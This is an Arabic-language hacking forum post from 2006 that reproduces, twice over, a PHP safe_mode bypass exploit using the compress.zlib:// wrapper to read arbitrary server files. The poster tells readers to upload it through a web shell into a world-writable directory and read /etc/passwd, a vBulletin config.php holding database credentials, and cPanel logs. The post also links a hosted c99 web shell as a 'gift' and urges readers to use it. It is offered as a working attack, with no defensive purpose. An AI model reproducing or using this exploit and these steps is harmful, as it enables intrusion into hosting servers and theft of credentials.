قائد
19-05-2006, 12:11
بسم الله الرحمن الرحيم الثغره هاذي تسمحلك بقرائة ملفات السريفر
<?php
/*
Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
by Maksymilian Arciemowicz SecurityReason.Com
cxib [at] securityreason [dot] com and max [at] jestsuper [dot] pl
pozdro sp3x
*/
$file=""; // File to Include... or use _GET _POST
$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp
echo "<PRE>\n";
if(empty($file)){
if(empty($_GET['file'])){
if(empty($_POST['file'])){
die("\nSet varibles \$tymczas, \$file or use for varible file POST, GET like
?file=/etc/passwd\n <B><CENTER><FONT
COLOR=\"RED\">SecurityReason.Com
Exploit</FONT></CENTER></B>");
} else {
$file=$_POST['file'];
}
} else {
$file=$_GET['file'];
}
}
$temp=tempnam($tymczas, "cx");
if(copy("compress.zlib://".$file, $temp)){
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo "<B>--- Start File ".htmlspecialchars($file)."
-------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File
".htmlspecialchars($file)." ---------------\n";
unlink($temp);
die("\n<FONT COLOR=\"RED\"><B>File
".htmlspecialchars($file)." has been already loaded. SecurityReason Team
;]</B></FONT>");
} else {
die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
access.</CENTER></FONT>");
}
?>
ارفع الملف عن طريق الشل الى اي ملف يحمل تصريح 777 واقرا ملفات الرسيفر والسيف مود اون
وطريقة التطبيق كذا http://www.xxx.com/xxx.php?file=/etc/passwd
و http://www.xxx.com/xxx.php?file=/home/user/public_html/vb/includes/config.php
و
http://www.xxx.com/xxx.php?file=/var/cpanel/accounting.log
يالربع ابعطيكم شل هديه وابيكم تطبقون الطريقه الي قلتلكم عليها وابي اشوف همتكم بالشل
http://war.gi-squad.com/upload/c99.php
وهذا التطبيق http://war.gi-squad.com/upload/151.php?file=/etc/passwd
<?php
/*
Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
by Maksymilian Arciemowicz SecurityReason.Com
cxib [at] securityreason [dot] com and max [at] jestsuper [dot] pl
pozdro sp3x
*/
$file=""; // File to Include... or use _GET _POST
$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp
echo "<PRE>\n";
if(empty($file)){
if(empty($_GET['file'])){
if(empty($_POST['file'])){
die("\nSet varibles \$tymczas, \$file or use for varible file POST, GET like
?file=/etc/passwd\n <B><CENTER><FONT
COLOR=\"RED\">SecurityReason.Com
Exploit</FONT></CENTER></B>");
} else {
$file=$_POST['file'];
}
} else {
$file=$_GET['file'];
}
}
$temp=tempnam($tymczas, "cx");
if(copy("compress.zlib://".$file, $temp)){
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo "<B>--- Start File ".htmlspecialchars($file)."
-------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File
".htmlspecialchars($file)." ---------------\n";
unlink($temp);
die("\n<FONT COLOR=\"RED\"><B>File
".htmlspecialchars($file)." has been already loaded. SecurityReason Team
;]</B></FONT>");
} else {
die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
access.</CENTER></FONT>");
}
?>
ارفع الملف عن طريق الشل الى اي ملف يحمل تصريح 777 واقرا ملفات الرسيفر والسيف مود اون
وطريقة التطبيق كذا http://www.xxx.com/xxx.php?file=/etc/passwd
و http://www.xxx.com/xxx.php?file=/home/user/public_html/vb/includes/config.php
و
http://www.xxx.com/xxx.php?file=/var/cpanel/accounting.log
يالربع ابعطيكم شل هديه وابيكم تطبقون الطريقه الي قلتلكم عليها وابي اشوف همتكم بالشل
http://war.gi-squad.com/upload/c99.php
وهذا التطبيق http://war.gi-squad.com/upload/151.php?file=/etc/passwd